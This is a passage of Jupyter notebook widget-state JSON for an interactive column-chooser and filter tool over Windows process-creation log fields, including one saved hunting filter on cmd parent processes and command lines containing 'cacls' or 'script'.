"IPY_MODEL_d7786047e2dc4f309f2385f17fe32dc5", "IPY_MODEL_eacebb41fb384c078fce1b8c377d0561" ], "layout": "IPY_MODEL_a5ac138657f44d96b86f90336f041a1e" } }, "c30b9753c9314d6e8601359f80c27b5a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "c3547c84759043b8aa461cb754754fd9": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "c36a852fa7dd4469bed195022bcedcba": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Choose columns", "1": "Filter data" }, "children": [ "IPY_MODEL_5e4a9ab5687b4c44b42eae3e5cd53193", "IPY_MODEL_862dbc1d217e4445b93a96a17792661c" ], "layout": "IPY_MODEL_b880c4dfe80447058c66366612e7bd58", "selected_index": 1 } }, "c50401bf861d45169f598225e2d9eb95": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_e8c3b59a99834acebaed0b8358616349", "IPY_MODEL_492e6b74c6fb4883ac8e7f217427b0f2", "IPY_MODEL_09c5521bc8ca478b8ca2930b32c2f6f3", "IPY_MODEL_8603589afd034ef18837d15a44717d2a" ], "layout": "IPY_MODEL_ae04095cbbcb4aecae07f913cd96b8ef" } }, "c541a659ef5247de88274ce099e211cc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "c59f4b4b12ea405aaf0f455b95dcb4b2": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "c5fcdf8ea5884d2a88dcad5a87416fd0": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_f4275863d3aa4f599341acb67bb42d79", "IPY_MODEL_86cd6f31f32949a6adc24e7e36fae932", "IPY_MODEL_2e774ca4b671491f8b2c6815725d2197", "IPY_MODEL_455a4f5afc00481cbda4e6749f52df45" ], "layout": "IPY_MODEL_ac7accb7fbcd45aaa1387d8548373abd" } }, "c637944b7f694ee3a2339c345f1fd0d2": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "solid gray 1px", "margin": "1pt", "padding": "5pt", "width": "80%" } }, "c66f8bee2513480cb6bbf9ccd65813fa": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove", "layout": "IPY_MODEL_926d144e06b24698bb51b8c51f18ac27", "style": "IPY_MODEL_e6887207495342f687d796cfcfcf1cb5" } }, "c70f6096a87940608ecb1abad231842b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "c8070c6701244ca0bbc0bdfd2c8277c5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_f160ac28c4df4a638a9e14a72187d4cf", "IPY_MODEL_a5cb991221db44d1986972f4758bd486" ], "layout": "IPY_MODEL_357904b77e634085ab873b108cec56e5" } }, "c8c388f3d0b84b93925baaef4499d14e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "solid gray 1px", "margin": "1pt", "padding": "5pt", "width": "80%" } }, "c8f3d5852944446f8da439f8deb6c483": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_dbe784888e5b4e259a64cf12deee896d", "style": "IPY_MODEL_91f88d6ddbd149f4911b712252262582", "value": "Enter multiple values separated by commas. Strings do not need quotes." } }, "c95fc31b16f740f7881c833b80dc0ff6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "ca39f6e939634ea1b8ef11bf0bcba99c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "ccde816cc3e24430892cc22423a2cc8c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "CheckboxModel", "state": { "description": "not", "disabled": false, "layout": "IPY_MODEL_3c8fd11bf6eb47bf935f8ad83ef84793", "style": "IPY_MODEL_ec5e3915e70c4a9dab9c9d602736c51c", "value": false } }, "cd0cbccc70804b6a95707356c1292568": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Delete filter", "layout": "IPY_MODEL_315902317a0547f9a8f19c4355197016", "style": "IPY_MODEL_41e832972ce94fd6b272cbcd2e381a24" } }, "cd7d521ef00c486795f5682f8bdf3551": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ce18307d720f4137901b5fccd2827cff": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "cf5e4274010541d8865bc05ddf91e0d2": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "cf88b195506e465585b9abaf1f824f41": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "cf90564c84924e9387482f4b4871f57a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "d01ff6e76da64f6aad95f814b058487a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "200px" } }, "d0c335b6bcab46379fda2071644ecc0b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Update filter", "layout": "IPY_MODEL_4720a484b76c4164b5d14b596ac913a8", "style": "IPY_MODEL_ce18307d720f4137901b5fccd2827cff" } }, "d1566493e90544909fb12b330299ac05": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_f20ffb637290441385bba89c732ca17b", "IPY_MODEL_84a9aec138164093a2e6067cd11155d1", "IPY_MODEL_d6c002bd38f041f5a84bcdcdcb15ad7a", "IPY_MODEL_601cfccce4314248aecf44c3d43382fc" ], "layout": "IPY_MODEL_eb96e104d86c4ca2a17d22cfccca00de" } }, "d1cfd4d8738a4ddd937998c2bb3bdfdb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "d1f472f503b449cab2a6c41db52dd204": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "d2069c750fa040c4a1abb7b12b7d02a3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Source: ", "index": [], "layout": "IPY_MODEL_053405d2adb34f11a7a8e696006a0ba9", "rows": 5, "style": "IPY_MODEL_14bdab08f5eb4ebf8d9ea4402abda2c2" } }, "d27747a718124893b894e03d17551e8e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "100px" } }, "d441f974166b4f72a2bafa678cbbded4": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "d4533ae3647e4d098cc51eb6a2127db3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "d4b71e3529c4456c853185a7be9f5ac8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "d623624498624e0c811372505b9ea306": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "d6aa34a7358d41baa5b43fd1af3699dd": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "d6c002bd38f041f5a84bcdcdcb15ad7a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove", "layout": "IPY_MODEL_a7dcffbaa4414c7fa5e011de31701511", "style": "IPY_MODEL_d1f472f503b449cab2a6c41db52dd204" } }, "d738b25d84fd4c3199fe462da739f0d9": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add ⇾", "layout": "IPY_MODEL_16f06a96b3b84861bc8fcdc521a9a9fc", "style": "IPY_MODEL_077317f3b9dc4febacc1ec8a17237f44" } }, "d738de016f5241e085832e853683bca7": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "d769aff3aca54cf0b7e3fe900f6b59cf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "d7786047e2dc4f309f2385f17fe32dc5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextModel", "state": { "description": "Filter:", "layout": "IPY_MODEL_4e297c36b90b4b4fa999fea2f992b72c", "style": "IPY_MODEL_d4b71e3529c4456c853185a7be9f5ac8" } }, "d81645b362234e3f9128e78f10c600f8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add All ⇾", "layout": "IPY_MODEL_cf90564c84924e9387482f4b4871f57a", "style": "IPY_MODEL_89cc2910803348458afee283b5741518" } }, "d840b505fd474fc587b39b8624adf0bf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Clear all filters", "layout": "IPY_MODEL_01b4914177cb4ea588ff91eb73cb18d2", "style": "IPY_MODEL_c30b9753c9314d6e8601359f80c27b5a" } }, "d8963740d2844d74922276773cd3a13d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_a9093fa6558d4ded9d1dbd81d012564d", "IPY_MODEL_dc4b373ad9954cda8d2ac0eba4fdf760", "IPY_MODEL_ece0dbb660834aa7bc4d2787ee0c4290", "IPY_MODEL_7ccb5b87754d479eb5e582d0342cc09c" ], "layout": "IPY_MODEL_1d25bec5fe57403d9fc4f20d2ff333d3" } }, "da88bfbd6a1041e18d934e1b94c84e28": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "Filter value", "layout": "IPY_MODEL_0f6cd28d4dc44a54be10c3bb6488a283", "style": "IPY_MODEL_4240f695acbc496489d98ddef8c4b4fa" } }, "dacfd3a9a0b34000bae4e67a85ca250a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "500px" } }, "dafe89f0ccf54e93a4e27e79cdbbb91d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_ef8be17e9bd245e49ae066a4377673d0", "style": "IPY_MODEL_6df397a9bfef4fff85d638ea7ed64ba3", "value": "Enter multiple values separated by commas. Strings do not need quotes." } }, "dbb9c0a587ba49d0966f793675444e26": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "dbe784888e5b4e259a64cf12deee896d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "dc28fe9e73b04921911a2c679421e2e8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "95%" } }, "dc4b373ad9954cda8d2ac0eba4fdf760": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_91c4521dd87b4611b0327231aeb56283", "IPY_MODEL_ddd19ce080fc44b2946ffee3ed4d3a49" ], "layout": "IPY_MODEL_9578b90f719547f0b4c11b238202c9cc" } }, "dcc07290f17244e1b2f7167f2ec5b403": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ddd19ce080fc44b2946ffee3ed4d3a49": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Update filter", "layout": "IPY_MODEL_169037276db6452cb2ef539bbfcd13cd", "style": "IPY_MODEL_ee4587f386544f71ad27714a37ebf8b8" } }, "de5a721dfab24746bca9695edc80f9af": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add ⇾", "layout": "IPY_MODEL_3599f0195f74406a9eefc7ea701c5a53", "style": "IPY_MODEL_ca39f6e939634ea1b8ef11bf0bcba99c" } }, "de824995993542838482144ef955b6ab": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "de89b5b8886a4db3837487d3aa14dd24": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "de973b84536943298f7fe5800bc3a62c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_de824995993542838482144ef955b6ab", "style": "IPY_MODEL_fa4f5144c5b54f0dbc0d982d7747fadc", "value": "Current filters" } }, "ded1344fbb1d46aba120fa799197296e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "CheckboxModel", "state": { "description": "not", "disabled": false, "layout": "IPY_MODEL_24f0b291afc94f2d9c1d7ad7e99aa4f0", "style": "IPY_MODEL_0354b7441ac24daaaaed54717c3d29ca", "value": false } }, "df18f2d18ec343158193cebc8f77b2ca": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "dfccb5d4237446459cc509270d55ba35": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "dff0190e115d4b2785e7a5fd7b074d8d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "e065ea541e08420c837b946865eb02cd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e13ff8b78c1a4f1a86cf3efd44926cce": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_c29e51193319449d81fadcf89b5bbfce", "IPY_MODEL_09f33472219641b89332f93f49ed773f" ], "layout": "IPY_MODEL_2e7cce877ce84b2d952c845e924acf80" } }, "e2328c04c2de42f989a5029717800568": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "==", "contains", "matches", "in", "between", "query" ], "index": 0, "layout": "IPY_MODEL_160638c038d04834a03e8cc1e8e788a4", "style": "IPY_MODEL_2b69ea13a55049a98b892d9cb690ba48" } }, "e4ee07ff3b964c7d8f29b74b985769dc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply filter", "layout": "IPY_MODEL_5c4e8097bca54b779cee09f7e6ad4084", "style": "IPY_MODEL_e5d1070cebe44fdea5a47642582859cb" } }, "e51b0aa5262c45bc9f1f3a6e3313d219": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e5d1070cebe44fdea5a47642582859cb": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "e60df3b80f6746369ec6051d19a3a3b6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_4b5cb16646744994a0591fd8c712a95c", "IPY_MODEL_10d96dd974f54d1a8e5a94cb9c03872e", "IPY_MODEL_77e028053b3f49799406ea9d7cb56953" ], "layout": "IPY_MODEL_f27451d097b5468caf4f8770d68b139e" } }, "e62e7f1a080640fd90e2fb1471583396": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e66cc5687c9b491c82606ce504ad107c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "40%" } }, "e6887207495342f687d796cfcfcf1cb5": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "e6db1929109d48c19ca8b42095c4496d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e6e59154a9384db382274533a2321481": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_51133fd46f5b40a9b4846a7375020529", "IPY_MODEL_befe835037dc4d2c91e679f463aac44a" ], "layout": "IPY_MODEL_5ea3e5fb5bfe4f5fb9004a659d5dc3bb" } }, "e764c684b29b4baeae8f3d7e4070d57c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "e847652e2c8a45cab0ad278a6c880a08": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e8c3b59a99834acebaed0b8358616349": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "TenantId", "Account", "EventID", "TimeGenerated", "Computer", "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "ParentProcessName", "TargetLogonId", "SourceComputerId", "TimeCreatedUtc" ], "index": 14, "layout": "IPY_MODEL_d01ff6e76da64f6aad95f814b058487a", "style": "IPY_MODEL_88ac2326de314e9fb81828f0a49ab21e" } }, "e8fa63f35d3f43c6b516ef58e8535d31": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply columns", "layout": "IPY_MODEL_a453fb04433d445c8a906b6b5b86093f", "style": "IPY_MODEL_3fac7055e539457aae88db9d1b336a88" } }, "e95cc7a9a24948128c59f64d45e25e35": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_1d0daf94ee134e1b903ad364e730b934", "IPY_MODEL_99e3ed316f0c4801bbebdbcd7e5e9eea" ], "layout": "IPY_MODEL_af4f3a82204b425eaff3b8ae8f022c5c" } }, "e98ae86d25c84795a7adb7946fde3294": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "e9a364d8356242eaa460bfc61f58ce75": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove", "layout": "IPY_MODEL_bcb693da74b04b08b12702d7192a1797", "style": "IPY_MODEL_7634458fadea4febba04fb37f6a2b441" } }, "ea45bf84dd3646578c9f60b4113bea79": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Choose columns", "1": "Filter data" }, "children": [ "IPY_MODEL_a2042295c9d24d27acfc9fe059cdeaa2", "IPY_MODEL_fc148fd97a9647f5bea276ad71322829" ], "layout": "IPY_MODEL_1032768376944459aa3e6c70a39123b6", "selected_index": 1 } }, "eacebb41fb384c078fce1b8c377d0561": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_73ace9de6deb47e08240f8355a93cbf0", "IPY_MODEL_d1566493e90544909fb12b330299ac05", "IPY_MODEL_853b539b4a84472694072df83fc030af" ], "layout": "IPY_MODEL_1ed4e7117a7a46439348eef4ba7f228b" } }, "eb3dc04670bd49e5a34fadf671232fb0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "eb96e104d86c4ca2a17d22cfccca00de": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ec1d999779764d73bc094bd79d94caf2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_b3910b3aa2ef40fba7b43d0cb4ab9d13", "style": "IPY_MODEL_2b8f523976c5435097fc758367a29155", "value": "Current filters" } }, "ec1f0973c9734ab4880c96cfd2aeabb3": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ec5e3915e70c4a9dab9c9d602736c51c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "ecc9cf108d494c27b2e982c04e75b1e6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_d2069c750fa040c4a1abb7b12b7d02a3", "IPY_MODEL_29c61bd1b3764cac8949a397cc11ca0c", "IPY_MODEL_f307dc0314e64566b09853d75cec8b01" ], "layout": "IPY_MODEL_822a4e905a5c44f8897cac7be18a6a66" } }, "ece0dbb660834aa7bc4d2787ee0c4290": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_95c7078cbbc14e81800c9beaca07ab61", "IPY_MODEL_9d1e3519a8aa40f8afc5253b143f1cfc" ], "layout": "IPY_MODEL_700662f2d6474ed083f4288403c33847" } }, "edc7b60605b14803a11f32010de9f9dd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ede5f65334bb4b3f8c03c55d590663ee": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ee4587f386544f71ad27714a37ebf8b8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "ef0ff907f7944bf0995004e685b6309e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ef8be17e9bd245e49ae066a4377673d0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "efb5f03aa620490a90d8ff5f537efb4c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "f06eec399f3c4636bd958d097dec7c31": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "TenantId", "Account", "EventID", "TimeGenerated", "Computer", "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "ParentProcessName", "TargetLogonId", "SourceComputerId", "TimeCreatedUtc" ], "index": 0, "layout": "IPY_MODEL_263cb71d2dab4c549c1f7cfd0e1ab996", "style": "IPY_MODEL_a4db3fb217db4ee099ade4ec11dc5f91" } }, "f160ac28c4df4a638a9e14a72187d4cf": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Delete filter", "layout": "IPY_MODEL_ec1f0973c9734ab4880c96cfd2aeabb3", "style": "IPY_MODEL_57fc931f1f6745b5b44d7360f6ee88f7" } }, "f20ffb637290441385bba89c732ca17b": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add All ⇾", "layout": "IPY_MODEL_d1cfd4d8738a4ddd937998c2bb3bdfdb", "style": "IPY_MODEL_4adbd494324149ee87c67f74fb08c17a" } }, "f27451d097b5468caf4f8770d68b139e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "f307dc0314e64566b09853d75cec8b01": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessName", "ParentProcessName", "TimeGenerated" ], "description": "Selected: ", "index": [], "layout": "IPY_MODEL_053405d2adb34f11a7a8e696006a0ba9", "rows": 5, "style": "IPY_MODEL_676fdbb9a65043568fd3c819d1cf7a3d" } }, "f410bb9feac74bff8c2576f2affec5bd": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "==", "contains", "matches", "in", "between", "query" ], "index": 0, "layout": "IPY_MODEL_d27747a718124893b894e03d17551e8e", "style": "IPY_MODEL_ae90356d18304d3db37a05ffb571255c" } }, "f42540ef834c46588330bc919ebe7a37": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "⇽ Remove All", "layout": "IPY_MODEL_6194e41b56e9470090e9ade5fb082686", "style": "IPY_MODEL_ba9e467fd43a4f8a9fd1945b5b733982" } }, "f4275863d3aa4f599341acb67bb42d79": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add All ⇾", "layout": "IPY_MODEL_24cd9a81835f496aa7097b6502a8818c", "style": "IPY_MODEL_3421dbe76372482c9fbad5f3bba4582a" } }, "f49a1b720a034428aeaf34e514aea0a8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "solid gray 1px", "margin": "1pt", "padding": "5pt", "width": "80%" } }, "f4f60fc719914eacb9755d5f34d6e6e8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "40%" } }, "f54de8691386447697961c9c868f9a29": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "height": "200px", "width": "40%" } }, "f5f1db4d825c4c669f6c4b75ceaa636d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "f859b4a334e14303ab3708553ba044e4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "f88331d7df0c45e4b15afc2261ba564e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "f89dd23f69274462bbc7cf9024d352e6": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectModel", "state": { "_options_labels": [ "EventID query 'ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))'" ], "description": "Filters", "index": 0, "layout": "IPY_MODEL_85b9e3ef6fbe424aa297286fc8ff7b4d", "style": "IPY_MODEL_4290b96dad854b4e8ef4d3ef551ebd05" } }, "f9bb93dfd701429682c1c6bb625f5063": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_ec1d999779764d73bc094bd79d94caf2", "IPY_MODEL_650a6653093a4b51b357c79f7b3d5ba5" ], "layout": "IPY_MODEL_c8c388f3d0b84b93925baaef4499d14e" } }, "fa0d00879f4545729b6398deb167094d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply filter", "layout": "IPY_MODEL_49926b14baa846ed9ec26bffa8f01557", "style": "IPY_MODEL_58e88d32feee440798b623eab2c6e1ca" } }, "fa4f5144c5b54f0dbc0d982d7747fadc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "fc148fd97a9647f5bea276ad71322829": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_9dff4a1c556a4a0483e3f1be59d6abd1", "IPY_MODEL_e95cc7a9a24948128c59f64d45e25e35", "IPY_MODEL_f9bb93dfd701429682c1c6bb625f5063", "IPY_MODEL_fa0d00879f4545729b6398deb167094d" ], "layout": "IPY_MODEL_0e6ce2977dbb4f9399699b3d650b23fb" } }, "fc24f008595e4a16830989b86d128b23": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add filter", "layout": "IPY_MODEL_9c4d084fb7a74bb3bc7fdf8dccc7e7d1", "style": "IPY_MODEL_2e8cf80eb31f4d838fb45ff75ceadd24" } }, "fc2633ade3cd4bd3aa91761a21db9fe1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_66d6f1f9aacf406aa8e5222b4e95e897", "style": "IPY_MODEL_bf13fcf0577a4563999273f2becb1a40", "value": " in " } }, "fc40d426613c4c298b80596e4b386a8b": { "model_module": "@jupyter-widgets/controls", "model_module_version": 